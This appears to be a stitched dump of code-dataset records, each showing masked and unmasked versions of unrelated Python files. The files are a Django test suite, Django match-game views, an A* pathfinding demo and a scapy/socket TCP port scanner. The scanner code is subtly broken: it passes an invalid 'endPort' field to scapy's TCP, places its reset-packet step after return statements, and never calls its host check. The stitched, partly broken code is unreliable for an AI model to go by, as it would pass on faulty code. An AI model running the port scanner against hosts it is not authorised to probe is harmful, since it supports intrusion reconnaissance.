self.assertEqual(data.get('count'), 1)\n product_first = data.get('results')[0]\n self.assertEqual(product_first.get('name'), 'Cadeira')\n self.assertEqual(product_first.get('price'), 250)\n self.assertEqual(product_first.get('quantity'), 2)\n self.assertEqual(product_first.get('status'), 'Active')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,\n 'quantity': 2, 'status': 'ACTIVE'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, 'Mesa')\n",
"step-3": "<mask token>\n\n\nclass SellerModelTests(TestCase):\n\n def test_class_str(self):\n seller = Seller()\n seller.name = 'Bruna'\n self.assertEquals(seller.__str__(), 'Bruna')\n <mask token>\n <mask token>\n\n\nclass ProductModelTests(TestCase):\n\n def product_class_str(self):\n product = Product()\n product.name = 'Cadeira'\n self.assertEquals(product.__str__(), 'Cadeira')\n\n def product_to_dict(self):\n product = Product()\n product.name = 'Cadeira'\n product.price = 2000\n product.seller = 'Bruna'\n product.quantity = 10\n product.status = 'Active'\n result_product = {'id': None, 'name': 'Cadeira', 'price': 2000,\n 'seller': 'Bruna', 'quantity': 10, 'status': 'Active'}\n self.assertEquals(product.to_dict(), result_product)\n\n\nclass SellerViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name='Bruna', email='bruna@example.com')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n seller_first = data.get('results')[0]\n self.assertEqual(seller_first.get('name'), 'Bruna')\n self.assertEqual(seller_first.get('email'), 'bruna@example.com')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {'name': 'Bruna',\n 'email': 'bruna@example.com'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, 'Bruna')\n\n\nclass ProductViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name='Cadeira', price=250, quantity=2,\n status='Active')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n product_first = data.get('results')[0]\n 
self.assertEqual(product_first.get('name'), 'Cadeira')\n self.assertEqual(product_first.get('price'), 250)\n self.assertEqual(product_first.get('quantity'), 2)\n self.assertEqual(product_first.get('status'), 'Active')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,\n 'quantity': 2, 'status': 'ACTIVE'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, 'Mesa')\n",
"step-4": "from django.test import TestCase\nfrom .models import Seller, Product\nfrom rest_framework.test import APIClient\nimport json\n\n\nclass SellerModelTests(TestCase):\n\n def test_class_str(self):\n seller = Seller()\n seller.name = 'Bruna'\n self.assertEquals(seller.__str__(), 'Bruna')\n\n def test_to_dict(self):\n seller = Seller()\n seller.name = 'Bruna'\n seller.email = 'bruna@example.com'\n result_seller = {'id': None, 'name': 'Bruna', 'email':\n 'bruna@example.com'}\n self.assertEquals(seller.to_dict(), result_seller)\n\n def test_class_str_without_name(self):\n seller = Seller()\n self.assertEqual(seller.__str__(), '')\n\n\nclass ProductModelTests(TestCase):\n\n def product_class_str(self):\n product = Product()\n product.name = 'Cadeira'\n self.assertEquals(product.__str__(), 'Cadeira')\n\n def product_to_dict(self):\n product = Product()\n product.name = 'Cadeira'\n product.price = 2000\n product.seller = 'Bruna'\n product.quantity = 10\n product.status = 'Active'\n result_product = {'id': None, 'name': 'Cadeira', 'price': 2000,\n 'seller': 'Bruna', 'quantity': 10, 'status': 'Active'}\n self.assertEquals(product.to_dict(), result_product)\n\n\nclass SellerViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name='Bruna', email='bruna@example.com')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n seller_first = data.get('results')[0]\n self.assertEqual(seller_first.get('name'), 'Bruna')\n self.assertEqual(seller_first.get('email'), 'bruna@example.com')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {'name': 'Bruna',\n 'email': 'bruna@example.com'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, 
'Bruna')\n\n\nclass ProductViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name='Cadeira', price=250, quantity=2,\n status='Active')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n product_first = data.get('results')[0]\n self.assertEqual(product_first.get('name'), 'Cadeira')\n self.assertEqual(product_first.get('price'), 250)\n self.assertEqual(product_first.get('quantity'), 2)\n self.assertEqual(product_first.get('status'), 'Active')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,\n 'quantity': 2, 'status': 'ACTIVE'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, 'Mesa')\n",
"step-5": "from django.test import TestCase\nfrom .models import Seller, Product\nfrom rest_framework.test import APIClient\nimport json\n\n\nclass SellerModelTests(TestCase):\n\n def test_class_str(self):\n seller = Seller()\n seller.name = \"Bruna\"\n\n self.assertEquals(seller.__str__(), \"Bruna\")\n\n def test_to_dict(self):\n seller = Seller()\n seller.name = \"Bruna\"\n seller.email = \"bruna@example.com\"\n\n result_seller = {\n \"id\": None,\n \"name\": \"Bruna\",\n \"email\": \"bruna@example.com\"\n }\n\n self.assertEquals(seller.to_dict(), result_seller)\n\n def test_class_str_without_name(self):\n seller = Seller()\n self.assertEqual(seller.__str__(), \"\")\n\n\nclass ProductModelTests(TestCase):\n\n def product_class_str(self):\n product = Product()\n product.name = \"Cadeira\"\n\n self.assertEquals(product.__str__(), \"Cadeira\")\n\n def product_to_dict(self):\n product = Product()\n product.name = \"Cadeira\"\n product.price = 2000\n product.seller = \"Bruna\"\n product.quantity = 10\n product.status = \"Active\"\n\n result_product = {\n \"id\": None,\n \"name\": \"Cadeira\",\n \"price\": 2000,\n \"seller\": \"Bruna\",\n \"quantity\": 10,\n \"status\": \"Active\"\n\n }\n\n self.assertEquals(product.to_dict(), result_product)\n\n\nclass SellerViewTests(TestCase):\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name=\"Bruna\", email=\"bruna@example.com\")\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.content)\n\n self.assertEqual(data.get('count'), 1)\n\n seller_first = data.get('results')[0]\n\n self.assertEqual(seller_first.get(\"name\"), \"Bruna\")\n self.assertEqual(seller_first.get(\"email\"), \"bruna@example.com\")\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {\n \"name\": \"Bruna\",\n \"email\": \"bruna@example.com\"\n })\n\n 
self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, \"Bruna\")\n\n\nclass ProductViewTests(TestCase):\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name=\"Cadeira\", price=250, quantity=2, status=\"Active\")\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n\n product_first = data.get('results')[0]\n\n self.assertEqual(product_first.get(\"name\"), \"Cadeira\")\n self.assertEqual(product_first.get(\"price\"), 250)\n self.assertEqual(product_first.get(\"quantity\"), 2)\n self.assertEqual(product_first.get(\"status\"), \"Active\")\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {\n \"name\": \"Mesa\",\n \"price\": 300,\n \"quantity\": 2,\n \"status\": \"ACTIVE\"\n })\n\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, \"Mesa\")\n",
"step-ids": [
9,
10,
13,
16,
17
]
}
|
[
9,
10,
13,
16,
17
] |
from django.shortcuts import render, redirect
from .game import run
from .models import Match
from team.models import Team, Player
from django.urls import reverse
# Create your views here.
def startgame(request):
match = Match(team1_pk = 1, team2_pk = 2)
team1 = Team.objects.get(pk = match.team1_pk)
team2 = Team.objects.get(pk = match.team2_pk)
player1 = Player.objects.get(pk = match.team1_pk * 5 - 4)
player2 = Player.objects.get(pk = match.team1_pk * 5 - 3)
player3 = Player.objects.get(pk = match.team1_pk * 5 - 2)
player4 = Player.objects.get(pk = match.team1_pk * 5 - 1)
player5 = Player.objects.get(pk = match.team1_pk * 5 - 0)
player6 = Player.objects.get(pk = match.team2_pk * 5 - 4)
player7 = Player.objects.get(pk = match.team2_pk * 5 - 3)
player8 = Player.objects.get(pk = match.team2_pk * 5 - 2)
player9 = Player.objects.get(pk = match.team2_pk * 5 - 1)
player10 = Player.objects.get(pk = match.team2_pk * 5 - 0)
team1list = [player1, player2, player3, player4, player5]
team2list = [player6, player7, player8, player9, player10]
return render(request, 'match/startgame.html', {'team1': team1, 'team2': team2, 'team1list': team1list, 'team2list': team2list})
def results(request):
team1damage = 0
team2damage = 0
winner = run(1, 2)
team1 = Team.objects.get(pk = 1)
team2 = Team.objects.get(pk = 2)
player1 = Player.objects.get(pk = 1)
player2 = Player.objects.get(pk = 2)
player3 = Player.objects.get(pk = 3)
player4 = Player.objects.get(pk = 4)
player5 = Player.objects.get(pk = 5)
player6 = Player.objects.get(pk = 6)
player7 = Player.objects.get(pk = 7)
player8 = Player.objects.get(pk = 8)
player9 = Player.objects.get(pk = 9)
player10 = Player.objects.get(pk = 10)
team1list = [player1, player2, player3, player4, player5]
team2list = [player6, player7, player8, player9, player10]
for i in range(5):
team1damage += team1list[i].damage_dealt
team2damage += team2list[i].damage_dealt
team1damage = round(team1damage, 2)
team2damage = round(team2damage, 2)
team1hp = round(500.0 - team2damage, 2)
if team1hp <= 0.0:
team1hp = 0.0
team2hp = round(500.0 - team1damage, 2)
if team2hp <= 0.0:
team2hp = 0.0
return render(request, 'match/results.html', {'team1': team1, 'team2': team2, 'team1list': team1list, 'team2list': team2list, 'winner': winner, 'team1damage': team1damage, 'team2damage': team2damage, 'team1hp': team1hp, 'team2hp': team2hp})
|
normal
|
{
"blob_id": "e1829904cea51909b3a1729b9a18d40872e7c13c",
"index": 6163,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef results(request):\n team1damage = 0\n team2damage = 0\n winner = run(1, 2)\n team1 = Team.objects.get(pk=1)\n team2 = Team.objects.get(pk=2)\n player1 = Player.objects.get(pk=1)\n player2 = Player.objects.get(pk=2)\n player3 = Player.objects.get(pk=3)\n player4 = Player.objects.get(pk=4)\n player5 = Player.objects.get(pk=5)\n player6 = Player.objects.get(pk=6)\n player7 = Player.objects.get(pk=7)\n player8 = Player.objects.get(pk=8)\n player9 = Player.objects.get(pk=9)\n player10 = Player.objects.get(pk=10)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n for i in range(5):\n team1damage += team1list[i].damage_dealt\n team2damage += team2list[i].damage_dealt\n team1damage = round(team1damage, 2)\n team2damage = round(team2damage, 2)\n team1hp = round(500.0 - team2damage, 2)\n if team1hp <= 0.0:\n team1hp = 0.0\n team2hp = round(500.0 - team1damage, 2)\n if team2hp <= 0.0:\n team2hp = 0.0\n return render(request, 'match/results.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list, 'winner':\n winner, 'team1damage': team1damage, 'team2damage': team2damage,\n 'team1hp': team1hp, 'team2hp': team2hp})\n",
"step-3": "<mask token>\n\n\ndef startgame(request):\n match = Match(team1_pk=1, team2_pk=2)\n team1 = Team.objects.get(pk=match.team1_pk)\n team2 = Team.objects.get(pk=match.team2_pk)\n player1 = Player.objects.get(pk=match.team1_pk * 5 - 4)\n player2 = Player.objects.get(pk=match.team1_pk * 5 - 3)\n player3 = Player.objects.get(pk=match.team1_pk * 5 - 2)\n player4 = Player.objects.get(pk=match.team1_pk * 5 - 1)\n player5 = Player.objects.get(pk=match.team1_pk * 5 - 0)\n player6 = Player.objects.get(pk=match.team2_pk * 5 - 4)\n player7 = Player.objects.get(pk=match.team2_pk * 5 - 3)\n player8 = Player.objects.get(pk=match.team2_pk * 5 - 2)\n player9 = Player.objects.get(pk=match.team2_pk * 5 - 1)\n player10 = Player.objects.get(pk=match.team2_pk * 5 - 0)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n return render(request, 'match/startgame.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list})\n\n\ndef results(request):\n team1damage = 0\n team2damage = 0\n winner = run(1, 2)\n team1 = Team.objects.get(pk=1)\n team2 = Team.objects.get(pk=2)\n player1 = Player.objects.get(pk=1)\n player2 = Player.objects.get(pk=2)\n player3 = Player.objects.get(pk=3)\n player4 = Player.objects.get(pk=4)\n player5 = Player.objects.get(pk=5)\n player6 = Player.objects.get(pk=6)\n player7 = Player.objects.get(pk=7)\n player8 = Player.objects.get(pk=8)\n player9 = Player.objects.get(pk=9)\n player10 = Player.objects.get(pk=10)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n for i in range(5):\n team1damage += team1list[i].damage_dealt\n team2damage += team2list[i].damage_dealt\n team1damage = round(team1damage, 2)\n team2damage = round(team2damage, 2)\n team1hp = round(500.0 - team2damage, 2)\n if team1hp <= 0.0:\n team1hp = 0.0\n team2hp = round(500.0 - team1damage, 2)\n if team2hp <= 0.0:\n team2hp = 
0.0\n return render(request, 'match/results.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list, 'winner':\n winner, 'team1damage': team1damage, 'team2damage': team2damage,\n 'team1hp': team1hp, 'team2hp': team2hp})\n",
"step-4": "from django.shortcuts import render, redirect\nfrom .game import run\nfrom .models import Match\nfrom team.models import Team, Player\nfrom django.urls import reverse\n\n\ndef startgame(request):\n match = Match(team1_pk=1, team2_pk=2)\n team1 = Team.objects.get(pk=match.team1_pk)\n team2 = Team.objects.get(pk=match.team2_pk)\n player1 = Player.objects.get(pk=match.team1_pk * 5 - 4)\n player2 = Player.objects.get(pk=match.team1_pk * 5 - 3)\n player3 = Player.objects.get(pk=match.team1_pk * 5 - 2)\n player4 = Player.objects.get(pk=match.team1_pk * 5 - 1)\n player5 = Player.objects.get(pk=match.team1_pk * 5 - 0)\n player6 = Player.objects.get(pk=match.team2_pk * 5 - 4)\n player7 = Player.objects.get(pk=match.team2_pk * 5 - 3)\n player8 = Player.objects.get(pk=match.team2_pk * 5 - 2)\n player9 = Player.objects.get(pk=match.team2_pk * 5 - 1)\n player10 = Player.objects.get(pk=match.team2_pk * 5 - 0)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n return render(request, 'match/startgame.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list})\n\n\ndef results(request):\n team1damage = 0\n team2damage = 0\n winner = run(1, 2)\n team1 = Team.objects.get(pk=1)\n team2 = Team.objects.get(pk=2)\n player1 = Player.objects.get(pk=1)\n player2 = Player.objects.get(pk=2)\n player3 = Player.objects.get(pk=3)\n player4 = Player.objects.get(pk=4)\n player5 = Player.objects.get(pk=5)\n player6 = Player.objects.get(pk=6)\n player7 = Player.objects.get(pk=7)\n player8 = Player.objects.get(pk=8)\n player9 = Player.objects.get(pk=9)\n player10 = Player.objects.get(pk=10)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n for i in range(5):\n team1damage += team1list[i].damage_dealt\n team2damage += team2list[i].damage_dealt\n team1damage = round(team1damage, 2)\n team2damage = round(team2damage, 
2)\n team1hp = round(500.0 - team2damage, 2)\n if team1hp <= 0.0:\n team1hp = 0.0\n team2hp = round(500.0 - team1damage, 2)\n if team2hp <= 0.0:\n team2hp = 0.0\n return render(request, 'match/results.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list, 'winner':\n winner, 'team1damage': team1damage, 'team2damage': team2damage,\n 'team1hp': team1hp, 'team2hp': team2hp})\n",
"step-5": "from django.shortcuts import render, redirect\nfrom .game import run\nfrom .models import Match\nfrom team.models import Team, Player\nfrom django.urls import reverse\n\n# Create your views here.\n\ndef startgame(request):\n match = Match(team1_pk = 1, team2_pk = 2)\n\n team1 = Team.objects.get(pk = match.team1_pk)\n team2 = Team.objects.get(pk = match.team2_pk)\n\n player1 = Player.objects.get(pk = match.team1_pk * 5 - 4)\n player2 = Player.objects.get(pk = match.team1_pk * 5 - 3)\n player3 = Player.objects.get(pk = match.team1_pk * 5 - 2)\n player4 = Player.objects.get(pk = match.team1_pk * 5 - 1)\n player5 = Player.objects.get(pk = match.team1_pk * 5 - 0)\n player6 = Player.objects.get(pk = match.team2_pk * 5 - 4)\n player7 = Player.objects.get(pk = match.team2_pk * 5 - 3)\n player8 = Player.objects.get(pk = match.team2_pk * 5 - 2)\n player9 = Player.objects.get(pk = match.team2_pk * 5 - 1)\n player10 = Player.objects.get(pk = match.team2_pk * 5 - 0)\n\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n \n return render(request, 'match/startgame.html', {'team1': team1, 'team2': team2, 'team1list': team1list, 'team2list': team2list})\n\ndef results(request):\n team1damage = 0\n team2damage = 0\n\n winner = run(1, 2)\n \n team1 = Team.objects.get(pk = 1)\n team2 = Team.objects.get(pk = 2)\n \n player1 = Player.objects.get(pk = 1)\n player2 = Player.objects.get(pk = 2)\n player3 = Player.objects.get(pk = 3)\n player4 = Player.objects.get(pk = 4)\n player5 = Player.objects.get(pk = 5)\n player6 = Player.objects.get(pk = 6)\n player7 = Player.objects.get(pk = 7)\n player8 = Player.objects.get(pk = 8)\n player9 = Player.objects.get(pk = 9)\n player10 = Player.objects.get(pk = 10)\n \n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n \n for i in range(5):\n team1damage += team1list[i].damage_dealt\n team2damage += 
team2list[i].damage_dealt\n\n team1damage = round(team1damage, 2)\n team2damage = round(team2damage, 2)\n\n team1hp = round(500.0 - team2damage, 2)\n if team1hp <= 0.0: \n team1hp = 0.0\n\n team2hp = round(500.0 - team1damage, 2)\n if team2hp <= 0.0:\n team2hp = 0.0\n\n return render(request, 'match/results.html', {'team1': team1, 'team2': team2, 'team1list': team1list, 'team2list': team2list, 'winner': winner, 'team1damage': team1damage, 'team2damage': team2damage, 'team1hp': team1hp, 'team2hp': team2hp})",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from AStar import astar
def main():
grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
start = (0, 0)
end = (8, 9)
path = astar(grid, start, end)
print(path)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "ba483c7eaf2f2ced7f70a14b53c781f190585024",
"index": 1257,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0], [0,\n 0, 0, 0, 1, 0, 0, 0, 0, 0], [1, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, \n 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 1, 0, 0, 0], [0, 0, 0, \n 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n start = 0, 0\n end = 8, 9\n path = astar(grid, start, end)\n print(path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0], [0,\n 0, 0, 0, 1, 0, 0, 0, 0, 0], [1, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, \n 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 1, 0, 0, 0], [0, 0, 0, \n 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n start = 0, 0\n end = 8, 9\n path = astar(grid, start, end)\n print(path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from AStar import astar\n\n\ndef main():\n grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0], [0,\n 0, 0, 0, 1, 0, 0, 0, 0, 0], [1, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, \n 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 1, 0, 0, 0], [0, 0, 0, \n 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n start = 0, 0\n end = 8, 9\n path = astar(grid, start, end)\n print(path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from AStar import astar\n\n\ndef main():\n grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n\n start = (0, 0)\n end = (8, 9)\n\n path = astar(grid, start, end)\n print(path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Original code from http://www.pythonforbeginners.com/code-snippets-source-code/port-scanner-in-python
#!/usr/bin/env python
# modules
import threading
import socket
import subprocess
import sys
import time
import scapy
from threading import Thread, Lock
from queue import Queue
from datetime import datetime
from logging import getLogger, ERROR
getLogger("scapy.runtime") .setLevel (ERROR)
from scapy.all import *
subprocess.call('clear', shell=True)
# print_lock = threading.Lock() - WIP, threading not implemented yet.
# Enter target host and port range
target = input("Enter a remote host to scan: ")
targetIP = socket.gethostbyname(target)
startPort = int(input("Enter the start port to scan: "))
endPort = int(input("Enter the end port to scan: "))
# Setting some values
ports = range(int(startPort), int(endPort)+1)
t1 = datetime.now()
SYNACK = 0x12
RSTACK = 0x14
# Banner displaying which host is being scanned
print ("-" * 60)
print ("Please wait, scanning remote host...", targetIP)
localtime = time.asctime(time.localtime())
print ("Scan started at: ", localtime)
def checkhost(ip):
conf.verb = 0
try:
ping = sr1(IP(dst = ip)/ICMP())
print ("\n[*] Target is up, beginning scan...") #this text isn't displayed - why?
except Exception:
print ("\n[!] Couldn't resolve target")
sys.exit("Exiting...")
print ("-" * 60)
def scanport(port):
startPort = RandShort() # scapy func that generates a small random nr to use as a source port.
conf.verb = 0 # prevents output from sending pkts from being printed to the screen.
SYNACKpkt = sr1(IP(dst = target)/TCP(sport = startPort, endPort = port, flags = "S")) # Scapy func sr1() used to craft & send a SYN pkt .
pktflags = SYNACKpkt.getlayer(TCP).flags
if pktflags == SYNACK:
return True
else:
return False
RSTpkt = IP(dst = target)/TCP(sport = startPort, endPort = port, flags = "R")
send(RSTpkt)
# Error handling
try:
for port in range(int(startPort), int(endPort)+1):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((targetIP, port))
if result == 0:
print ("Port {}: [+] Open".format(port))
elif result != 0:
print ("Port {}: [-] Closed".format(port))
sock.close()
except KeyboardInterrupt:
sys.exit("You pressed Ctrl+C")
except socket.gaierror:
sys.exit("Hostname could not be resolved. Exiting")
except socket.error:
sys.exit("Couldn't connect to server")
t2 = datetime.now()
# Calculates the difference in time, to see how long it took to run the script
total = t2 - t1
print ("-" * 60)
print ("Scanning Completed in: ", total)
|
normal
|
{
"blob_id": "7e0eefb1d913787f675adc2ba0dccb16007464e4",
"index": 1764,
"step-1": "<mask token>\n\n\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst=ip) / ICMP())\n print('\\n[*] Target is up, beginning scan...')\n except Exception:\n print(\"\\n[!] Couldn't resolve target\")\n sys.exit('Exiting...')\n\n\n<mask token>\n\n\ndef scanport(port):\n startPort = RandShort()\n conf.verb = 0\n SYNACKpkt = sr1(IP(dst=target) / TCP(sport=startPort, endPort=port,\n flags='S'))\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst=target) / TCP(sport=startPort, endPort=port, flags='R')\n send(RSTpkt)\n\n\n<mask token>\n",
"step-2": "<mask token>\ngetLogger('scapy.runtime').setLevel(ERROR)\n<mask token>\nsubprocess.call('clear', shell=True)\n<mask token>\nprint('-' * 60)\nprint('Please wait, scanning remote host...', targetIP)\n<mask token>\nprint('Scan started at: ', localtime)\n\n\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst=ip) / ICMP())\n print('\\n[*] Target is up, beginning scan...')\n except Exception:\n print(\"\\n[!] Couldn't resolve target\")\n sys.exit('Exiting...')\n\n\nprint('-' * 60)\n\n\ndef scanport(port):\n startPort = RandShort()\n conf.verb = 0\n SYNACKpkt = sr1(IP(dst=target) / TCP(sport=startPort, endPort=port,\n flags='S'))\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst=target) / TCP(sport=startPort, endPort=port, flags='R')\n send(RSTpkt)\n\n\ntry:\n for port in range(int(startPort), int(endPort) + 1):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((targetIP, port))\n if result == 0:\n print('Port {}: [+] Open'.format(port))\n elif result != 0:\n print('Port {}: [-] Closed'.format(port))\n sock.close()\nexcept KeyboardInterrupt:\n sys.exit('You pressed Ctrl+C')\nexcept socket.gaierror:\n sys.exit('Hostname could not be resolved. Exiting')\nexcept socket.error:\n sys.exit(\"Couldn't connect to server\")\n<mask token>\nprint('-' * 60)\nprint('Scanning Completed in: ', total)\n",
"step-3": "<mask token>\ngetLogger('scapy.runtime').setLevel(ERROR)\n<mask token>\nsubprocess.call('clear', shell=True)\ntarget = input('Enter a remote host to scan: ')\ntargetIP = socket.gethostbyname(target)\nstartPort = int(input('Enter the start port to scan: '))\nendPort = int(input('Enter the end port to scan: '))\nports = range(int(startPort), int(endPort) + 1)\nt1 = datetime.now()\nSYNACK = 18\nRSTACK = 20\nprint('-' * 60)\nprint('Please wait, scanning remote host...', targetIP)\nlocaltime = time.asctime(time.localtime())\nprint('Scan started at: ', localtime)\n\n\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst=ip) / ICMP())\n print('\\n[*] Target is up, beginning scan...')\n except Exception:\n print(\"\\n[!] Couldn't resolve target\")\n sys.exit('Exiting...')\n\n\nprint('-' * 60)\n\n\ndef scanport(port):\n startPort = RandShort()\n conf.verb = 0\n SYNACKpkt = sr1(IP(dst=target) / TCP(sport=startPort, endPort=port,\n flags='S'))\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst=target) / TCP(sport=startPort, endPort=port, flags='R')\n send(RSTpkt)\n\n\ntry:\n for port in range(int(startPort), int(endPort) + 1):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((targetIP, port))\n if result == 0:\n print('Port {}: [+] Open'.format(port))\n elif result != 0:\n print('Port {}: [-] Closed'.format(port))\n sock.close()\nexcept KeyboardInterrupt:\n sys.exit('You pressed Ctrl+C')\nexcept socket.gaierror:\n sys.exit('Hostname could not be resolved. Exiting')\nexcept socket.error:\n sys.exit(\"Couldn't connect to server\")\nt2 = datetime.now()\ntotal = t2 - t1\nprint('-' * 60)\nprint('Scanning Completed in: ', total)\n",
